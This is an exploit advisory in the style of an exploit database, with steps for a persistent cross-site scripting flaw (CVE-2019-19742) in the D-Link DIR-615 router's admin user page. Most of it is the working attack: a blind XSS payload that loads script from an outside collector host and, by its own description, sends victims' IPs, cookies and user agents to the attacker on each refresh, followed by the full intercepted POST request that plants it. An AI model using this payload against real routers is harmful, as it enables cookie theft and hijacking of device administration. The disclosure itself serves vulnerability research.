37 lines
No EOL
1.6 KiB
Text
37 lines
No EOL
1.6 KiB
Text
# Exploit Title: D-Link DIR-615 Wireless Router - Persistent Cross-Site Scripting
|
||
# Date: 2019-12-13
|
||
# Exploit Author: Sanyam Chawla
|
||
# Vendor Homepage: http://www.dlink.co.in
|
||
# Category: Hardware (Wi-fi Router)
|
||
# Hardware Link: http://www.dlink.co.in/products/?pid=678
|
||
# Hardware Version: T1
|
||
# Firmware Version: 20.07
|
||
# Tested on: Windows 10 and Kali linux
|
||
# CVE: CVE-2019-19742
|
||
|
||
Reproduction Steps:
|
||
1. Login to your wi-fi router gateway with admin credentials [i.e: http://192.168.0.1]
|
||
2. Go to Maintenance page and click on Admin on the left panel
|
||
3. Put blind xss Payload in to the name field “><script src=https://ptguy.xss.ht></script>. This payload saved by the server and its reflected in the user page.
|
||
4. Every refresh in the user home page, the blind XSS payload executes and sends data (IP, cookies, victim user agent) to the attacker.
|
||
5. For HTML injection just put <b> Testing </b> in username field, you will get the username bold in your homepage.
|
||
|
||
#Burp Intercept
|
||
|
||
POST /form2userconfig.cgi HTTP/1.1
|
||
Host: 192.168.0.1
|
||
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0)
|
||
Gecko/20100101 Firefox/71.0
|
||
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
|
||
Accept-Language: en-US,en;q=0.5
|
||
Accept-Encoding: gzip, deflate
|
||
Content-Type: application/x-www-form-urlencoded
|
||
Content-Length: 180
|
||
Origin: http://192.168.0.1
|
||
Connection: close
|
||
Referer: http://192.168.0.1/userconfig.htm
|
||
Cookie: SessionID=
|
||
Upgrade-Insecure-Requests: 1
|
||
|
||
username=*%22%3E%3Cscript%20src%3Dhttps%3A%2F%2Fptguy.xss.ht
|
||
<http://2Fptguy.xss.ht>%3E%3C%2Fscript%3E*&privilege=2&newpass=pentesting&confpass=pentesting&adduser=Add&hiddenpass=&submit.htm%3Fuserconfig.htm=Send |